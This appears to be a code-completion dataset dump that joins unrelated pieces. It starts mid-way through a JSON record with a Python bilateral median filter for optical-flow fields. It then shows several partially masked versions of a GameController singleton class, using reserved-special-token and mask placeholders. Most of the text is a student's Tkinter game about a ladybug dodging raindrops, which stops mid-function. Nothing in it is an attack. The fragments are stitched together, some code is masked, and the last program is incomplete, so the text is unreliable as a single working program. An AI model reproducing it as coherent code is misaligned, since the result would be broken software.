"step-4": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,\n sigma_distance = 7, sigma_color =7 / 200, filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n\n filter_half = int(filter_size / 2)\n\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size+1)\n helper_flow_y_list = [0.0] * (helper_list_size+1)\n weigths_list = [0.0] * helper_list_size\n\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n\n counter = 0\n\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2\n\n exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)\n\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n\n #weigth = math.exp(-exponent) * occlusen_compared / occlusen_current\n weigth = math.exp(-exponent+occlusen_compared-occlusen_current)\n weigths_list[counter] = weigth\n\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n\n counter += 1\n\n # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING\n # 3.13\n\n n = counter\n\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1/(2*(weigth_auxiliary / weigth_filter))\n\n for idx_1 in range(n+1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n\n result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])\n print(\"result_flow\")\n print(result_flow.flatten())\n return result_flow\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class GameController:
<|reserved_special_token_0|>
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
<|reserved_special_token_0|>
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GameController:
<|reserved_special_token_0|>
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GameController:
instance = None
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
<|reserved_special_token_1|>
from app.View.view import View
class GameController:
instance = None
@staticmethod
def get_instance():
if GameController.instance is None:
GameController()
return GameController.instance
def __init__(self):
if GameController.instance is not None:
raise Exception('this is a singleton!')
else:
GameController.instance = self
def start_game(self):
View.start_game_view()
|
flexible
|
{
"blob_id": "d9b405d5159a153fb8d2f1991ceb3dc47f98bcbc",
"index": 9192,
"step-1": "<mask token>\n\n\nclass GameController:\n <mask token>\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n <mask token>\n\n def start_game(self):\n View.start_game_view()\n",
"step-2": "<mask token>\n\n\nclass GameController:\n <mask token>\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-3": "<mask token>\n\n\nclass GameController:\n instance = None\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-4": "from app.View.view import View\n\n\nclass GameController:\n instance = None\n\n @staticmethod\n def get_instance():\n if GameController.instance is None:\n GameController()\n return GameController.instance\n\n def __init__(self):\n if GameController.instance is not None:\n raise Exception('this is a singleton!')\n else:\n GameController.instance = self\n\n def start_game(self):\n View.start_game_view()\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
#Arushi Patel (aruship)
from tkinter import *
import random
######################################
#images taken from wikipedia,pixabay,
#trans americas, clipartpanda,pngimg,
#findicons, microsoft word
######################################
####################################
# init
####################################
def init(data):
data.score =0
data.mode = "splashScreen"
data.timerDelay = 100
data.height = 800
data.width = 800
data.speed = 10
data.speedAI = 12
data.speedAI2 = 12
data.switchOnProgress = False
data.r = 25
data.cx= 280
data.cy=750
data.onLeft1, data.onLeft2 = True, True
data.win= False
data.coconuts = []
data.powerUps = []
data.coconuts1 = []
data.coconuts2 = []
data.coconutsAI1 =[]
data.coconutsAI2 = []
data.invincible = []
data.pauseDrops = False
data.pause1Drop = False
data.pause2Drop = False
init1(data)
def init1(data):
data.beInvincible = False
data.Invincible1 = False
data.Invincible2 = False
data.scaryBug = []
data.time = 0
data.coconutFall = False
data.sides = ["r", "l"]
data.level = 1
data.splashScreenTime = 0
data.splashScreenDrops = []
data.background= PhotoImage(file="tree.gif")
data.deadScreen = PhotoImage(file = "deadBug.gif")
data.ladyBug = PhotoImage(file = "lady.gif")
data.winScreen= PhotoImage(file = "treeTop1.gif")
data.winBug = PhotoImage(file = "littleBug.gif")
data.halfBackground = PhotoImage(file = "halfTree.gif")
data.umbrella = PhotoImage(file = "umbrella2.gif")
data.spider = PhotoImage(file = "spider.gif")
data.hourGlass = PhotoImage(file = "hourGlass.gif")
data.splashScreen = PhotoImage(file = "splash.gif")
init2(data)
def init2(data):
data.tbg= PhotoImage(file = "tbg2.gif")
data.click = PhotoImage(file = "click.gif")
data.notClick = PhotoImage(file = "notClick.gif")
data.player1X = 150
data.player1Y = 750
data.player2X = 550
data.player2Y = 750
data.winner = None
data.speed = 12
data.speed2 = 12
data.editorTime = 0
data.editorDrops = []
data.margin = 100
data.enter = False
data.powerUpsEditor = None
data.yourSpeed = None
data.rainSpeed = None
data.slow= data.notClick
data.medium = data.notClick
data.fast = data.notClick
data.drizzle = data.notClick
data.rain =data.notClick
data.thunderstorm = data.notClick
init3(data)
def init3(data):
data.yes = data.notClick
data.no = data.notClick
data.enter = data.notClick
data.levelEditorLives =2
data.rSpeed = None
data.start = None
data.start1 = None
data.start2 = None
data.difficulty = None
data.mode1 = data.notClick
data.mode2 = data.notClick
data.mode3 = data.notClick
data.mode4 = data.notClick
data.mode5 = data.notClick
data.mode6 = data.notClick
data.home = PhotoImage(file = "home.gif")
data.helpScreen = PhotoImage(file = "help1.gif")
data.title = PhotoImage(file = "title.gif")
data.scoreList = []
data.spotList = [270,364,458,552, 646, 740]
data.savedScores = readFile("score.txt")
if data.mode == "levelCreated":
setEverything(data)
initsplashScreenNumbers(data)
def initsplashScreenNumbers(data):
data.splashButtonY = 425
data.p1ButtonX= 225
data.p2ButtonX = 290
data.edButton = 355
data.diffButton = 425
data.helpButton = 490
data.sboardButton = 555
data.hitPenalty = 75
data.splashText = data.height/2-20
data.lives = 2
data.levelMax = 8
data.lane = 94
data.Player1Min= 270
data.Player1Max = 740
data.homeX =50
data.homeY = 650
initScoreBoardHelp(data)
init1Player(data)
def initScoreBoardHelp(data):
data.tbgY=5*data.height/12
data.txtTScore = 150
data.S_P = 220
data.numScores = 5
data.scorePos = data.height/10
data.scoreShift = 270
data.helpY = data.height/2-20
data.name = ""
data.printName = ""
data.hit = False
initAI(data)
def init1Player(data):
data.buffer = 40
def initAI(data):
data.AITY = 225
data.easyX = 200
data.easyY = 300
data.medX =400
data.hardX = 600
data.enterY = 450
data.difS = 4
data.difM = 6
data.difH = 8
data.last = 500
data.enterX = 575
data.PUT = 450
data.RST = 350
data.YST = 250
####################################
# mode dispatcher
####################################
def mousePressed(event, data):
if (data.mode == "splashScreen"): splashScreenMousePressed(event, data)
elif (data.mode == "1Player"): playerMousePressed(event, data)
elif (data.mode == "2Player"): twoPlayerMousePressed(event, data)
elif (data.mode == "editor"): editorMousePressed(event,data)
elif (data.mode == "levelCreated"): levelCreatedMousePressed(event,data)
elif (data.mode == "AI"): AIMousePressed(event, data)
elif (data.mode == "difficulty"): difficultyMousePressed(event, data)
elif (data.mode == "scoreboard"): scoreboardMousePressed(event, data)
elif (data.mode == "help"): helpMousePressed(event, data)
def keyPressed(event, data):
if (data.mode == "splashScreen"): splashKeyPressed(event, data)
elif (data.mode == "1Player"):playerKeyPressed(event, data)
elif (data.mode == "2Player"):twoPlayerKeyPressed(event, data)
elif (data.mode == "editor"): editorKeyPressed(event, data)
elif (data.mode == "levelCreated"): levelCreatedKeyPressed(event,data)
elif (data.mode == "AI"): AIKeyPressed(event, data)
elif (data.mode == "difficulty"): difficultyKeyPressed(event, data)
elif (data.mode == "scoreboard"): scoreboardKeyPressed(event, data)
elif (data.mode == "help"): helpKeyPressed(event, data)
def timerFired(data):
if (data.mode == "splashScreen"): splashScreenTimerFired(data)
elif (data.mode == "1Player"):playerTimerFired(data)
elif (data.mode == "2Player"):twoPlayerTimerFired(data)
elif (data.mode == "editor"): editorTimerFired(data)
elif (data.mode == "levelCreated"): levelCreatedTimerFired(data)
elif (data.mode == "AI"): AITimerFired(data)
elif (data.mode == "difficulty"): difficultyTimerFired(data)
elif (data.mode == "scoreboard"): scoreboardTimerFired(data)
elif (data.mode == "help"): helpTimerFired(data)
def redrawAll(canvas, data):
if (data.mode == "splashScreen"): splashScreenRedrawAll(canvas, data)
elif (data.mode == "1Player"):playerRedrawAll(canvas, data)
elif (data.mode == "2Player"):twoPlayerRedrawAll(canvas, data)
elif (data.mode == "editor"): editorRedrawAll(canvas, data)
elif (data.mode == "levelCreated"): levelCreatedRedrawAll(canvas,data)
elif (data.mode == "AI"): AIRedrawAll(canvas, data)
elif (data.mode == "difficulty"): difficultyRedrawAll(canvas, data)
elif (data.mode == "scoreboard"): scoreboardRedrawAll(canvas, data)
elif (data.mode == "help"): helpRedrawAll(canvas, data)
####################################
# splashScreen mode
####################################
def splashScreenMousePressed(event, data):
#checks for selection of mode
if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:
if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:
data.mode = "1Player"
if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:
data.mode = "2Player"
if data.edButton-data.r<=event.y<=data.edButton+data.r:
data.mode = "editor"
if data.diffButton-data.r<=event.y<=data.diffButton+data.r:
data.mode = "difficulty"
if data.helpButton-data.r<=event.y<=data.helpButton+data.r:
data.mode = "help"
if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:
data.mode = "scoreboard"
def splashKeyPressed(event, data):
pass
def splashScreenTimerFired(data):
data.splashScreenTime += 1
if data.splashScreenTime %2 ==1:
rainDropSplash(data)
for drop in data.splashScreenDrops:
drop.onTimerFired(data)
def splashScreenButtons(canvas, data):
canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)
canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)
canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)
canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)
canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)
canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)
def rainDropSplash(data):
xPosition = random.randint(0,800)
data.splashScreenDrops.append(Coconuts(xPosition,0))
def splashScreenRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.splashText-10, image=data.title)
for drop in data.splashScreenDrops: drop.draw(canvas)
canvas.create_text(data.width/2, data.splashText, text="""
1.) Single Player Level Mode
2.) Two-Player Mode
3.) Level Creator Practice Mode
4.) Play Against the Computer
5.) Help and Instructions
6.) Scoreboard
""", font="Arial 14 bold", fill = "yellow")
splashScreenButtons(canvas, data)
####################################
# taken from class notes
####################################
def writeFile(path, contents):
with open(path, "wt") as f:
f.write(contents)
def readFile(path):
with open(path, "rt") as f:
return f.read()
####################################
# 1Player mode
####################################
#Coconuts (from Mario game) represent the water drops
class Coconuts(object):
def __init__(self,x,y):
self.x = x
self.y = y
self.r = 9
self.fill = "deep sky blue"
self.speed = 30
self.outline= "blue"
def draw(self, canvas):
canvas.create_polygon(self.x,self.y- 2*self.r,
self.x-self.r, self.y,
self.x, self.y + self.r,
self.x+self.r, self.y, fill = self.fill,
outline = self.outline, width = 3)
def onTimerFired(self, data):
# downward falling motion
self.y += self.speed
def hit(data):
#checks for hitting rain
for coconut in data.coconuts:
if data.mode == "1Player" or data.mode == "levelCreated":
if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:
if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:
data.cy+=data.hitPenalty
if data.mode == "levelCreated":
data.lives-=1
elif data.hit ==False and data.level<data.levelMax:
data.score -=data.level
data.coconuts.remove(coconut)
if data.mode == "levelCreated":
data.levelEditorLives-=1
def hit2Player(data):
if data.mode == "2Player":
if data.Invincible1 == False:
#only when powerup isn't active
for coconut in data.coconuts1:
if coconut.y>=data.player1Y-data.r \
and coconut.y<=data.player1Y+data.r:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r:
data.player1Y+=data.hitPenalty
data.coconuts1.remove(coconut)
if data.Invincible2 == False:
#only when powerup isn't active
for coconut in data.coconuts2:
if coconut.y>=data.player2Y-data.r and \
coconut.y<=data.player2Y+data.r:
if coconut.x>=data.player2X-data.r and \
coconut.x<=data.player2X+data.r:
data.player2Y+=data.hitPenalty
data.coconuts2.remove(coconut)
class PowerUps(Coconuts):
def __init__(self,x,y):
super().__init__(x, y)
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.hourGlass)
def hitPause(data):
# checks if hits hour-glass & pauses with flag
for powerUp in data.powerUps:
if data.mode == "1Player" or data.mode == "levelCreated":
if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
data.pauseDrops = True
data.start = data.cy
data.powerUps.remove(powerUp)
elif data.mode == "2Player" or data.mode == "AI":
if powerUp.y>=data.player1Y-data.r and \
powerUp.y<=data.player1Y+data.r:
if powerUp.x>=data.player1X-data.r and \
powerUp.x<=data.player1X+data.r:
data.pause1Drop = True
data.start1 = data.player1Y
data.powerUps.remove(powerUp)
if powerUp.y>=data.player2Y-data.r and \
powerUp.y<=data.player2Y+data.r:
if powerUp.x>=data.player2X-data.r and \
powerUp.x<=data.player2X+data.r:
data.pause2Drop = True
data.start2 = data.player2Y
data.powerUps.remove(powerUp)
class Invincible(PowerUps):
def __init__(self,x,y):
super().__init__(x, y)
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.umbrella)
def hitInvincible(data):
#checks if hits umbrella powerup
for powerUp in data.invincible:
if data.mode == "1Player" or data.mode == "levelCreated":
if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
data.beInvincible = True
data.start = data.cy
data.invincible.remove(powerUp)
if data.mode == "2Player" or data.mode == "AI":
#for player1
if powerUp.y>=data.player1Y-data.r and \
powerUp.y<=data.player1Y+data.r:
if powerUp.x>=data.player1X-data.r and \
powerUp.x<=data.player1X+data.r:
data.Invincible1=True
data.start1 = data.player1Y
data.invincible.remove(powerUp)
# for player 2
if powerUp.y>=data.player2Y-data.r and \
powerUp.y<=data.player2Y+data.r:
if powerUp.x>=data.player2X-data.r and \
powerUp.x<=data.player2X+data.r:
data.Invincible2=True
data.start2 = data.player2Y
data.invincible.remove(powerUp)
class ScaryBug(object):
def __init__(self,x,y):
self.x = x
self.y = y
self.speed = 25
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.spider)
def onTimerFired(self, data):
if data.mode =="2Player" or data.mode == "AI":
self.speed = 35
self.y -= self.speed
if data.mode == "1Player" or data.mode == "levelCreated" and\
data.time %8 ==0:
#makes spider dynamically move
side = random.choice(data.sides)
if side == "l":
if self.x -data.lane >=data.Player1Min:self.x-=data.lane
else: self.x+=data.lane
elif side == "r":
if self.x+data.lane<= data.Player1Max:self.x +=data.lane
else: self.x -=data.lane
def hitScaryBug(data):
# checks for automatic death by spider
for bug in data.scaryBug:
if data.mode == "1Player" or data.mode == "levelCreated":
if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:
if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:
data.hit = True
data.lives = 0
data.levelEditorLives = 0
if data.mode == "2Player" or data.mode == "AI":
if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:
if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:
data.winner= "player2"
if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:
if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:
data.winner= "player1"
def drawPowerups(canvas, data):
for bug in data.scaryBug:
bug.draw(canvas, data)
for powerUp in data.powerUps:
powerUp.draw(canvas, data)
for powerUp in data.invincible:
powerUp.draw(canvas, data)
def drawHome(canvas, data):
#home button in every screen
canvas.create_image(data.homeX,data.homeY, image= data.home)
def checkHome(event, data):
if data.homeY-data.r<= event.y <= data.homeY +data.r:
if data.homeX-data.r<= event.x<=data.homeX+ data.r:
init(data)
def coconutShot(data):
if data.level >0 and data.pauseDrops == False:
if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:
#increases drops as level increases
xPosition1 = random.randint(0,data.Player1Min-data.buffer)
xPosition2 = random.randint(data.Player1Max+data.buffer,
data.width +data.buffer)
data.coconuts.append(Coconuts(xPosition1,0))
data.coconuts.append(Coconuts(xPosition2,0))
xPosition4 = random.randint(data.Player1Min-data.buffer,
data.Player1Max+data.buffer)
data.coconuts.append(Coconuts(xPosition4,0))
if data.time %5 ==0:
xPosition3 = random.randint(0, data.Player1Min-data.buffer)
data.coconuts.append(Coconuts(xPosition3,0))
if data.time % int(24/data.level) ==0:
side = random.choice(data.sides)
if side == "l":
data.coconuts.append(Coconuts(data.Player1Min,0))
elif side =="r":
data.coconuts.append(Coconuts(data.Player1Max,0))
powerUpCoconutShot(data)
def powerUpCoconutShot(data):
#adds powerUps
#magic #s toallow for powerups to be added at different times
if data.time % 60 == 0 and data.time%120 !=0:
Position = random.choice(data.spotList)
data.powerUps.append(PowerUps(Position,0))
if data.time%50 == 0:
Position = random.choice(data.spotList)
data.invincible.append(Invincible(Position,0))
if data.time %100==0:
Position = random.choice(data.spotList)
data.scaryBug.append(ScaryBug(Position,750))
def playerKeyPressed(event,data):
if data.level<data.levelMax and event.keysym == "r": init(data)
if (event.keysym == "Left") and data.cx>=data.Player1Min+(data.lane/2):
data.cx -=(data.lane)/2
elif(event.keysym == "Right") and data.cx<=data.Player1Max:
data.cx +=(data.lane)/2
if data.level >= data.levelMax:
#enter name for scoreboard
if len(event.keysym) ==1:
if len(data.name) <15:
data.name += event.keysym
if event.keysym=="BackSpace":
data.name = data.name[0:-1]
if event.keysym == "Return":
data.scoreList += ((data.score, data.name))
#saves file
writeFile("score.txt",
data.savedScores+str(data.score)+","+data.name+"\n")
data.mode ="scoreboard"
def playerMousePressed(event, data): checkHome(event, data)
def playerTimerFired(data):
#actually pauses, and moves drops/player
if data.hit== False and data.level<data.levelMax:
data.cy-=data.speed
if data.time%5 ==0: data.score +=data.level
if data.cy < 15: #basically made it to the top
data.level +=1
data.cy = data.Player1Max + 10
data.speed +=2
if data.cy>40: #so drops you can't see don't hit you
data.time +=1
if data.pauseDrops !=True: coconutShot(data)
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible: powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug: bug.onTimerFired(data)
hitScaryBug(data)
for coconut in data.coconuts:
# only want drops to move if not paused
if data.pauseDrops == False: coconut.onTimerFired(data)
if data.beInvincible == False:hit(data)
if data.start != None:
if abs(data.start-data.cy) >= 120:
#to limit time for powerups to be active
data.pauseDrops, data.beInvincible = False, False
def playerRedrawAll(canvas, data):
# magic #s mainly for screen placement
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts: coconut.draw(canvas)
drawPowerups(canvas, data)
canvas.create_image(data.cx, data.cy, image=data.ladyBug)
canvas.create_text(data.width/6,50, text ="Level: %d" %data.level,
font = "Arial 18 bold", fill = "yellow")
canvas.create_text(data.width/6,80, text ="Score: %d" %data.score,
font = "Arial 18 bold", fill = "yellow")
canvas.create_text(2*data.width/3,660,
text ="""The greater the level, the more points get
added to your score!""",
font = "Arial 15 bold", fill = "yellow")
if data.hit== True:
canvas.create_rectangle(0,0,data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
canvas.create_text(data.width/2,data.height/4,
text = "You Lose! Better Luck Next Time!",
font = "Helvetica 23 bold", fill = "yellow")
canvas.create_text(data.width/2,280, text ="Score: %d" %data.score,
font = "Arial 13 bold", fill = "yellow")
if data.level >= 8: madeIt(canvas, data)
drawHome(canvas, data)
def madeIt(canvas, data):# magic #s mainly for screen placement
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,70, text = "You Made it!",
font = "Arial 23 bold", fill = "yellow")
canvas.create_text(data.width/2,100, text ="Score: %d" %data.score,
font = "Arial 15 bold", fill = "yellow")
canvas.create_text(data.width/2,375, text ="Congrats! Enter your Name!",
font = "Arial 15 bold", fill = "yellow")
canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,
fill = "white")
canvas.create_text(data.width/2, 425, text = data.name)
####################################
# 2Player mode
####################################
def drop2Player(data):
#adds drops when not paused
#magic #s are position of where drops are starting
if data.winner ==None and data.pauseDrops == False:
if data.time%15==0:
xPosition1 = random.randint(0,385)
if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:
#so random drops don't interfere with the lane ones
if data.pause1Drop != True:
data.coconuts1.append(Coconuts(xPosition1,0))
if data.pause2Drop != True:
data.coconuts2.append(Coconuts(xPosition1 +410,0))
if data.time % 12 ==0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.coconuts1.append(Coconuts(140,0))
if data.pause2Drop != True:
data.coconuts2.append(Coconuts(540,0))
elif side =="r":
if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0))
if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))
powerupDrop2Player(data)
def powerupDrop2Player(data):
#adds powerups on both screens (in the same position)
if data.time % 45 == 0 and data.time%90 !=0:
#randomize placement
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))
if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))
elif side =="r":
if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))
if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))
if data.time%60 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))
if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))
elif side =="r":
if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))
if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))
if data.time %90==0:
side = random.choice(data.sides)
if side == "l":
data.scaryBug.append(ScaryBug(140,750))
data.scaryBug.append(ScaryBug(540,750))
elif side =="r":
data.scaryBug.append(ScaryBug(344,750))
data.scaryBug.append(ScaryBug(755,750))
def twoPlayerKeyPressed(event,data):
# controllers for both bugs
if event.keysym == "r": init(data)
if data.winner==None:
if (event.keysym == "a") and data.onLeft1==False:
data.onLeft1 = True
data.player1X = 150
if(event.keysym == "d") and data.onLeft1== True:
data.onLeft1 = False
data.player1X = 330
if (event.keysym == "Left") and data.onLeft2==False:
data.onLeft2 = True
data.player2X = 550
if(event.keysym == "Right") and data.onLeft2 == True:
data.onLeft2 = False
data.player2X = 750
def twoPlayerMousePressed(event, data):
checkHome(event, data)
def twoPlayerTimerFired(data):
if data.winner == None:
data.player1Y-=data.speed
#<15 signifies that lady bug reached the top
if data.player1Y < 15 and data.player2Y >15:
data.winner= "player1"
if data.player1Y>40:
data.time +=1
drop2Player(data)
data.player2Y-=data.speed
if data.player2Y < 15 and data.player1Y> 15:
data.winner= "player2"
if data.player2Y>40:
data.time +=1
drop2Player(data)
if data.player1Y < 15 and data.player2Y <15:
data.winner = "tie"
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible:powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug:bug.onTimerFired(data)
hitScaryBug(data)
powerupTimerFired(data)
def powerupTimerFired(data):
for coconut in data.coconuts1:
if data.pause1Drop == False:
coconut.onTimerFired(data)
hit2Player(data)
for coconut in data.coconuts2:
if data.pause2Drop == False:
coconut.onTimerFired(data)
if data.start1 != None:
# to make powerups only active for set amount of time
if abs(data.start1-data.player1Y) >= 120:
data.pause1Drop = False
data.Invincible1 = False
if data.start2 != None:
if abs(data.start2-data.player2Y) >= 120:
data.pause2Drop = False
data.Invincible2 = False
def twoPlayerRedrawAll(canvas, data):
#magic #s for placement on screen
canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts1: coconut.draw(canvas)
for coconut in data.coconuts2: coconut.draw(canvas)
drawPowerups(canvas, data)
canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold",
fill = "yellow")
canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold",
fill = "yellow")
winner(canvas, data)
drawHome(canvas, data)
def winner(canvas, data):
if data.winner== "player1":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! Player 1",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "player2":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! Player 2",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "tie":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# editor mode
####################################
def editorKeyPressed(event,data):
if event.keysym == "r": init(data)
def editorMousePressed(event, data):
#check for click on button for your speed
checkHome(event, data)
if data.easyY-data.r<= event.y <= data.easyY +data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.yourSpeed = "slow"
data.slow = data.click
data.medium, data.fast = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.yourSpeed = "medium"
data.medium = data.click
data.slow, data.fast = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.yourSpeed = "fast"
data.fast = data.click
data.slow, data.medium = data.notClick, data.notClick
checkMiddle(event, data)
checkLast(event, data)
def checkMiddle(event, data):
#check for click on button for rain speed
if data.medX-data.r<= event.y <= data.medX + data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.rainSpeed = "drizzle"
data.drizzle = data.click
data.rain, data.thunderstorm = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.rainSpeed = "rain"
data.rain = data.click
data.drizzle, data.thunderstorm = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.rainSpeed = "thunderstorm"
data.thunderstorm = data.click
data.drizzle, data.rain = data.notClick, data.notClick
def checkLast(event, data):
#check for click on button for powerups
if data.last-data.r<=event.y<= data.last+data.r:
if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:
data.powerUpsEditor = True
data.yes, data.no = data.click, data.notClick
if data.last-2*data.r<= event.x<=data.last+2*data.r:
data.powerUpsEditor = False
data.no, data.yes = data.click, data.notClick
if data.enter == data.click:
